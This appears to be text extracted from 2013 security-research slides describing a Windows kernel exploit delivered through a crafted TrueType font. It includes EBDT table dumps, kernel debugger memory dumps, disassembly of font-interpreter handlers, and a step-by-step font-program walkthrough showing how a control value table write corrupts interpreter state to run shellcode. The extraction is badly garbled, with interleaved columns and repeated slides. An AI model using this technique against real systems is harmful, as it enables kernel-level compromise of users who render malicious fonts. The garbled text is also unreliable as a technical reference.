-----------------First Glyph Index:
Last Glyph Index:
Index Format:
Image Format:
Image Data Offset Base:
Glyph:
3
Offset:
Last Offset:
3
3
3
1
0x00000016
0x00000016
0x0000001c
Index Sub Table 2
-----------------First Glyph Index:
Last Glyph Index:
Index Format:
Image Format:
Image Data Offset Base:
Glyph:
4
Offset:
Last Offset:
4
4
3
8
0x0000001c
0x0000001c
0x00000028
'EBDT' Table - Embedded Bitmap Data Table
----------------------------------------Version: 2.0
Strike 1
Size = 4
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
EBDT
Y:00 A:00
Y:00 A:00
1
xOffset = 72, yOffset = 10
Strike 3
Size = 6
---------------------Strike 2
Size = 5
Glyph
3 Metrics:
---------------------Image:
Glyph
3 Metrics: H:01 W:01 X:00 Y:00 A:00
Glyph
4 Metrics:
Image: 80
Component Glyph:
Glyph
4 Metrics: H:01 W:ff X:00 Y:00 A:00
Component[0]:
Component Glyph: numComponents: 1
Component[0]: glyphCode = 3, xOffset = 72, yOffset = 10
Friday, March 8, 2013
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
Strike 4
Size = 7
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
Strike 5
Size = 8
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
H:01 W:01 X:00 Y:00 A:00
80
H:01 W:ff X:00 Y:00 A:00
numComponents: 1
Y:00 A:00
1
xOffset = 72, yOffset = 10
Y:00 A:00
1
xOffset = 72, yOffset = 10
Strike 5
Size = 8
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
Strike 6
Size = 1
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
EBDT
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
Y:00 A:00
1
xOffset = 72, yOffset = 10
This is the exploit
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
Y:00 A:00
1
xOffset = 64, yOffset = 82
A one by one pixel bitmap of 0x80
Friday, March 8, 2013
Strike 5
Size = 8
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
Strike 6
Size = 1
---------------------Glyph
3 Metrics:
Image:
Glyph
4 Metrics:
Component Glyph:
Component[0]:
Friday, March 8, 2013
EBDT
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
Y:00 A:00
1
xOffset = 72, yOffset = 10
This controls where in memory
H:01 W:01 X:00
80
H:01 W:ff X:00
numComponents:
glyphCode = 3,
Y:00 A:00
This getsY:00
OR’d
A:00in memory
1
xOffset = 64, yOffset = 82
Exploit Implementation
Friday, March 8, 2013
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000 00000000 00000040 bf85c269
e2481fc4 00000003
00000000 00000000 00000000
+0x90: auto_flip
e2481fd4 00030009 00000080 00000001 00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
e2482054 00000000 00000000 00000000 00000000
CVT+[4*0x25]= [CVT+0x94] = [Global State +0x90]
e2482064 00002000 00000400 00000080 0000000a
e2482074 00002000 00000400 00000080 0000000a
e2482084
00002000State
00000400
00000080 0000000a
CVT=Global
-4
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
00030004
CVT e2481f84 e2481afc e2481f00 e2481f80
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000 00000000 00000040 bf85c269
e2481fc4 00000003
00000000 00000000 00000000
+0x90: auto_flip
e2481fd4 00030009 00000080 00000001 00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
; __fastcall itrp_FLIPON(x, x)
e2482054 proc
00000000
00000000 ;00000000
@itrp_FLIPON@8
near
CODE XREF: 00000000
itrp_InnerExecute(x,x)+2B^Xp
itrp_InnerTraceExecute(x,x)+56^Yp
e2482064 00002000 00000400 ;00000080
0000000a
; DATA XREF: ...
e2482074 mov
00002000
00000400
00000080 0000000a
eax, ecx
e2482084 mov
00002000
00000080 0000000a
ecx, 00000400
dword_BF9A9234
byte 00010000
ptr [ecx+90h],
1
e2482094 mov
00010000
00000001
00000000
retn
e24820a4
00000000 00000200 00000000 00000001
@itrp_FLIPON@8 endp
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
Graphics State Summary
Aha!
The following tables summarize the variables that make up the Graphics State.
Nearly all of the Graphics State variables have a default value as shown
below. That value is reestablished for every glyph in a font. Instructions are
available for resetting the value of all Graphics State variables. Some state
variables can be reset in the CVT Program. In such cases the value set
becomes the new default and will be reestablished for each glyph. When value
of a state variable is changed by instructions associated with a particular
glyph, it will hold only for that glyph.
The setting of the Graphics State variables will affect the actions of certain
instructions. Affected instructions are listed for each variable.
Graphics State Variable
Default
Set With
Affects
auto_flip
TRUE
FLIPOFF
FLIPON
MIAP
MIRP
control_value_cut_in
17/16 pixels
SCVTCI
MIAP
MIRP
delta_base
9
SDB
DELTAP1
DELTAP2
DELTAP3
DELTAC1
DELTAC2
DELTAC3
delta_shift
3
SDS
DELTAP1
DELTAP2
DELTAP3
DELTAC1
DELTAC2
DELTAC3
dual_projection_vectors
—
SDPVTL
IP
GC
MD
MDRP
MIRP
Revision 1.66
File Name: grstate.doc
Friday, March 8, 2013
Page 357
In other words, ABS()
Managing the direction of distances
The auto_flip variable owes its existence to the fact that the
TrueType interpreter distinguishes between distances measured
in the direction of the projection_vector (positive distances) and
those that are measured in the direction opposite to the
projection_vector (negative distances).
The setting of the auto_flip Boolean determines whether the
sign of values in the Control Value Table is significant. [...]
Friday, March 8, 2013
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000CVT+[0x2C*4]:
00000000 00000040 bf85c269
e2481fc4 00000003 00000000 00000000 00000000
Font Data =
e2481fd4 00030009[CVT+[0x2C*4]]
00000080 00000001 =00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
e2482054 00000000 00000000 00000000 00000000
e2482064 00002000 00000400 00000080 0000000a
e2482074 00002000 00000400 00000080 0000000a
e2482084 00002000 00000400 00000080 0000000a
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
Base
Shellcode
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000CVT+[0x2C*4]:
00000000 00000040 bf85c269
e2481fc4 00000003 00000000 00000000 00000000
Font Data = Shellcode
e2481fd4 00030009[CVT+[0x2C*4]]
00000080 00000001 =00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
kd> 00000000
dd e2482368
e2482054
00000000 00000000 00000000
e2482368
fffffbe8
000000ff
00000000
00000000
e2482064
00002000
00000400
00000080
0000000a
e2482378
00000000
00000000
00000000
00000000
e2482074
00002000
00000400
00000080
0000000a
e2482388
00000000
00000000
00000000
00000000
e2482084
00002000
00000400
00000080
0000000a
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000CVT+[0x2C*4]:
00000000 00000040 bf85c269
e2481fc4 00000003 00000000 00000000 00000000
Font Data = Shellcode
e2481fd4 00030009[CVT+[0x2C*4]]
00000080 00000001 =00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
kd> 00000000
dd e2482368
e2482054
00000000 00000000 00000000
e2482368
fffffbe8
000000ff
00000000
00000000
e2482064
00002000
00000400
00000080
0000000a
e2482378
00000000
00000000
00000000
00000000
e2482074
00002000
00000400
00000080
0000000a
e2482388
00000000
00000000
00000000
00000000
e2482084
00002000
00000400
00000080
0000000a
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
00000000
Friday, March 8, 2013
E8FBFFFFFF
call 0x0
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000CVT+[0x2C*4]:
00000000 00000040 bf85c269
e2481fc4 00000003 00000000 00000000 00000000
Font Data = Shellcode
e2481fd4 00030009[CVT+[0x2C*4]]
00000080 00000001 =00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
e2482054 00000000 00000000 00000000 00000000
e2482314
00000000
b8c07fb8
b863c001
b860403a
e2482064
00002000
00000400
00000080
0000000a
e2482324
1c600c00
00000000
00000000
00000000
e2482074
00002000
00000400
00000080
0000000a
e2482084 00002000 00000400 00000080 0000000a
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
MIRP
single_width_value
0 pixels
SSW
MIAP
MIRP
Opcode 0x1F = SSW = itrp_LSW(x,x)
Page 360
Friday, March 8, 2013
Revision 1.66
File Name: grstate.doc
; __fastcall itrp_LSW(x, x)
@itrp_LSW@8
proc near
mov
push
mov
push
push
; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp
; itrp_InnerTraceExecute(x,x)+56^Xp
; DATA XREF: ...
eax, dword_BF9A9234
ebx
ebx, [eax]
esi
edi
mov
dword_BF9A927C, 1110h
pop
ebx
retn
; --------------------------------------------------------------------------loc_BF98B9F9:
@itrp_LSW@8
Friday, March 8, 2013
; CODE XREF: itrp_LSW(x,x)+28^Xj
sub
mov
mov
movsx
mov
lea
call
mov
mov
pop
pop
pop
retn
endp
ecx, 4
dword_BF9A9228, ecx
ecx, [ecx]
edx, cx
[esi+32h], cx
ecx, [eax+100h]
dword ptr [eax+0ACh]
[esi+8], eax
eax, edi
edi
esi
ebx
; __fastcall itrp_LSW(x, x)
@itrp_LSW@8
proc near
mov
push
mov
push
push
; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp
; itrp_InnerTraceExecute(x,x)+56^Xp
; DATA XREF: ...
eax, dword_BF9A9234
ebx
ebx, [eax]
esi
edi
e2481f80
00000000
mov
dword_BF9A927C,
1110h
kd>
L100
popdd e2481f84
ebx
retn
e2481f84
e2481afc e2481f00 e2481f80 00030004
; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000
loc_BF98B9F9: ...
; CODE XREF: itrp_LSW(x,x)+28^Xj
e2482024
00000000
bf85bd4b bf85bd4b e2482368
sub
ecx,
4
e2482034
mov
dword_BF9A9228,
e24bdbb3 0000000d
ecx
e2482318 0003b89b
@itrp_LSW@8
Friday, March 8, 2013
mov
movsx
mov
lea
call
mov
mov
pop
pop
pop
retn
endp
ecx, [ecx]
edx, cx
[esi+32h], cx
ecx, [eax+100h]
dword ptr [eax+0ACh]
[esi+8], eax
eax, edi
edi
esi
ebx
[CVT+0xAC] = “SSW”
; __fastcall itrp_LSW(x, x)
@itrp_LSW@8
proc near
; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp
; itrp_InnerTraceExecute(x,x)+56^Xp
; DATA XREF: ...
kd> dd e2482368
eax, dword_BF9A9234
e2482368 mov
fffffbe8
000000ff 00000000 00000000
push
ebx
e2482378 mov
00000000
00000000 00000000
ebx, 00000000
[eax]
e2482388 push
00000000
esi 00000000 00000000 00000000
push
edi
e2481f80
00000000
mov
dword_BF9A927C,
1110h
kd>
L100
popdd e2481f84
ebx
retn
e2481f84
e2481afc e2481f00 e2481f80 00030004
; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000
loc_BF98B9F9: ...
; CODE XREF: itrp_LSW(x,x)+28^Xj
e2482024
00000000
bf85bd4b bf85bd4b e2482368
sub
ecx,
4
e2482034
mov
dword_BF9A9228,
e24bdbb3 0000000d
ecx
e2482318 0003b89b
@itrp_LSW@8
Friday, March 8, 2013
mov
movsx
mov
lea
call
mov
mov
pop
pop
pop
retn
endp
ecx, [ecx]
edx, cx
[esi+32h], cx
ecx, [eax+100h]
dword ptr [eax+0ACh]
[esi+8], eax
eax, edi
edi
esi
ebx
[CVT+0xAC] = “SSW”
; __fastcall itrp_LSW(x, x)
@itrp_LSW@8
proc near
; CODE XREF: itrp_InnerExecute(x,x)+2B^Xp
; itrp_InnerTraceExecute(x,x)+56^Xp
; DATA XREF: ...
kd> dd e2482368
eax, dword_BF9A9234
e2482368 mov
fffffbe8
000000ff 00000000 00000000
push
ebx
e2482378 mov
00000000
00000000 00000000
ebx, 00000000
[eax]
e2482388 push
00000000
esi 00000000 00000000 00000000
push
edi
e2481f80
00000000
mov
dword_BF9A927C,
1110h
kd>
L100
popdd e2481f84
ebx
retn
e2481f84
e2481afc e2481f00 e2481f80 00030004
; --------------------------------------------------------------------------e2481f94 00040000 00000000 00000000 00000000
loc_BF98B9F9: ...
; CODE XREF: itrp_LSW(x,x)+28^Xj
e2482024
00000000
bf85bd4b bf85bd4b e2482368
sub
ecx,
4
e2482034
mov
dword_BF9A9228,
e24bdbb3 0000000d
ecx
e2482318 0003b89b
mov
movsx
mov
lea
call
mov
mov
pop
pop
pop
retn
endp
00000000
@itrp_LSW@8
Friday, March 8, 2013
ecx, [ecx]
edx, cx
[esi+32h], cx
ecx, [eax+100h]
dword ptr [eax+0ACh]
[esi+8], eax
eax, edi
edi
esi
ebx
[CVT+0xAC] = “SSW”
E8FBFFFFFF
call 0x0
Font Program
Walkthrough
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
Push One Byte→0
Push One Byte→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
Push One Byte→0x00000000
Push One Byte→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
WS Value←0x00000000
WS Location←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
Storage Table:
0 1 2 3 4 5 6 7 8 9 10111213141516171819202122232
0
WS Value←0x00000000
WS Location←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
Storage Table:
0 1 2 3 4 5 6 7 8 9
0
'maxp' Table - Maximum Profile
-----------------------------Size = 32 bytes (expecting 32 bytes)
'maxp' version:
1.0
numGlyphs:
6
maxPoints:
2
maxContours:
1
maxCompositePoints:
0
maxCompositeContours:
0
10111213141516171819202122232
maxZones:
1
maxTwilightPoints:
0
maxStorage:
32
maxFunctionDefs:
0
maxInstructionDefs:
0
maxStackElements:
256
maxSizeOfInstructions: 0
maxComponentElements:
0
maxComponentDepth:
0
WS Value←0x00000000
WS Location←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
00005: FLIPOFF
00006: PUSHB[1] 0
00008: RS
; __fastcall
itrp_FLIPOFF(x,
00009:
RCVT
@itrp_FLIPOFF@8
proc near
00010:
FLIPON
00011: PUSHB[1] 0
mov
eax,
00013: RS
mov
ecx,
00014: RCVT
mov
byte
00015: SUB
00016: PUSHB[1] 23 retn
@itrp_FLIPOFF@8
endp
00018:
SWAP
00019: JROT ; (19+23=42)
Friday, March 8, 2013
x)
ecx
dword_BF9A9234
ptr [ecx+90h], 0
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
00005: FLIPOFF
00006: PUSHB[1] 0
00008: RS
00009: RCVT
00010: FLIPON
00011: PUSHB[1] 0
00013:
RS
; __fastcall
itrp_FLIPON(x, x)
00014:
RCVT
@itrp_FLIPON@8
proc near
00015: SUB
00016: PUSHB[1] 23 mov
eax, ecx
00018: SWAP
mov
ecx, dword_BF9A9234
00019: JROT ; (19+23=42)
mov
byte ptr [ecx+90h], 1
retn
@itrp_FLIPON@8 endp
Friday, March 8, 2013
=
CVT[1]
=
Global
State
e2481f80 ecx
00000000
00000: PUSHB[1] 0
kd> dd e2481f84 L100
00002: PUSHB[1] 0 e2481f84 e2481afc e2481f00 e2481f80 000300
e2481f94 00040000 00000000 00000000 000000
00004: WS
e2481fa4 00000000 00000044 00000000 000000
e2481fb4 00000000 00000000 00000040 bf85c2
00005: FLIPOFF
00006: PUSHB[1] 0 e2481fc4 00000003 00000000 00000000 000000
e2481fd4 00030009 00000080 00000001 000000
00008: RS
e2481fe4 00000000 00000000 00000000 000000
00009: RCVT
e2481ff4 00000040 bf85c269 00000003 000000
e2482004 00000000 00000000 00030009 000100
00010: FLIPON
e2482014 00000001 e2481f80
e2481f80
000000
+0x90:
auto_flip
00011: PUSHB[1] 0 e2482024 00000000 bf85bd4b bf85bd4b e24823
00013:
RS
e2482034 e24bdbb3
; __fastcall
itrp_FLIPON(x,
x)0000000d e2482318 0003b8
e2482044 00000000 00000000 00000000 000000
00014:
RCVT
@itrp_FLIPON@8 e2482054
proc near
00000000 00000000 00000000 000000
00015: SUB
e2482064 00002000 00000400 00000080 000000
00016: PUSHB[1] 23 e2482074
00002000
00000400 00000080 000000
mov
eax, ecx
e2482084 00002000 00000400 00000080 000000
00018: SWAP
mov
ecx,
dword_BF9A9234
e2482094 00010000 00010000 00000001 000000
00019: JROT ; (19+23=42)
mov
byte ptr
[ecx+90h],
1
e24820a4
00000000
00000200
00000000 000000
e24820b4
e2481290 00000081 00040000 000400
retn
e24820c4 00040000 00040000 00000000 000000
@itrp_FLIPON@8 endp
e24820d4 00002710 00000064 00989680 e1c5d4
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0
Push One Byte→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0
RS Location←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
RS Location
Storage Table:
0 1 2 3 4 5 6 7 8 9 101
0
Push One Byte→0
RS Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0
CVT Entry Number←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
'cvt ' Table - Control Value Table
---------------------------------Size = 2 bytes, 1 entries
Values
-----0: 0
Remember,
Original CVT:
0
0
Push One Byte→0
CVT Entry Number←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
CVT now has 129 entries
00005: FLIPOFF
00006: PUSHB[1] 0
00008: RS
000009:
1 2 3RCVT
4 5 6 7 8 9 10111213141516171819202122232
00010:
FLIPON
0
00011: PUSHB[1] 0
00013: RS
00014: RCVT
00015: SUB
00016: PUSHB[1] 23
00018: SWAP
00019: JROT ; (19+23=42)
Push One Byte→0
CVT Entry Number←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
CVT now has 129 entries
00005: FLIPOFF
00006: PUSHB[1] 0
00008: RS
000009:
1 2 3RCVT
4 5 6 7 8 9 10111213141516171819202122232
00010:
FLIPON
0
00011: PUSHB[1] 0
00013: RS
e2481f80 00000000
CVT[0]
00014: RCVT
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80 00030004
00015: SUB
e2481f94 00040000 00000000 00000000 00000000
00016: PUSHB[1] e2481fa4
23
00000000 00000044 00000000 00000000
00018: SWAP
e2481fb4 00000000 00000000 00000040 bf85c269
CVT[1]00000000
= Global
State
e2481fc4 00000003 00000000
00000000
00019: JROT ; (19+23=42)
Friday, March 8, 2013
e2481fd4
e2481fe4
e2481ff4
e2482004
e2482014
e2482024
00030009
00000000
00000040
00000000
00000001
00000000
00000080
00000000
bf85c269
00000000
e2481f80
bf85bd4b
00000001
00000000
00000003
00030009
e2481f80
bf85bd4b
00000044
00000000
00000000
00010080
00000000
e2482368
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0
CVT Value→0x00000000
Friday, March 8, 2013
=
CVT[1]
=
Global
State
e2481f80 ecx
00000000
00000: PUSHB[1] 0
kd> dd e2481f84 L100
00002: PUSHB[1] 0 e2481f84 e2481afc e2481f00 e2481f80 000300
e2481f94 00040000 00000000 00000000 000000
00004: WS
e2481fa4 00000000 00000044 00000000 000000
e2481fb4 00000000 00000000 00000040 bf85c2
00005: FLIPOFF
00006: PUSHB[1] 0 e2481fc4 00000003 00000000 00000000 000000
e2481fd4 00030009 00000080 00000001 000000
00008: RS
e2481fe4 00000000 00000000 00000000 000000
00009: RCVT
e2481ff4 00000040 bf85c269 00000003 000000
e2482004 00000000 00000000 00030009 000100
00010: FLIPON
e2482014 00000001 e2481f80
e2481f80
000000
+0x90:
auto_flip
00011: PUSHB[1] 0 e2482024 00000000 bf85bd4b bf85bd4b e24823
00013:
RS
e2482034 e24bdbb3
; __fastcall
itrp_FLIPON(x,
x)0000000d e2482318 0003b8
e2482044 00000000 00000000 00000000 000000
00014:
RCVT
@itrp_FLIPON@8 e2482054
proc near
00000000 00000000 00000000 000000
00015: SUB
e2482064 00002000 00000400 00000080 000000
00016: PUSHB[1] 23 e2482074
00002000
00000400 00000080 000000
mov
eax, ecx
e2482084 00002000 00000400 00000080 000000
00018: SWAP
mov
ecx,
dword_BF9A9234
e2482094 00010000 00010000 00000001 000000
00019: JROT ; (19+23=42)
mov
byte ptr
[ecx+90h],
1
e24820a4
00000000
00000200
00000000 000000
e24820b4
e2481290 00000081 00040000 000400
retn
e24820c4 00040000 00040000 00000000 000000
@itrp_FLIPON@8 endp
e24820d4 00002710 00000064 00989680 e1c5d4
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0x00000000
CVT Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
RS Location←0x00000000
CVT Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
RS Value→0x00000000
CVT Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
CVT Entry Number←0x00000000
CVT Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
CVT Value→0x00000000
CVT Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Second Operand←0x00000000
First Operand←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
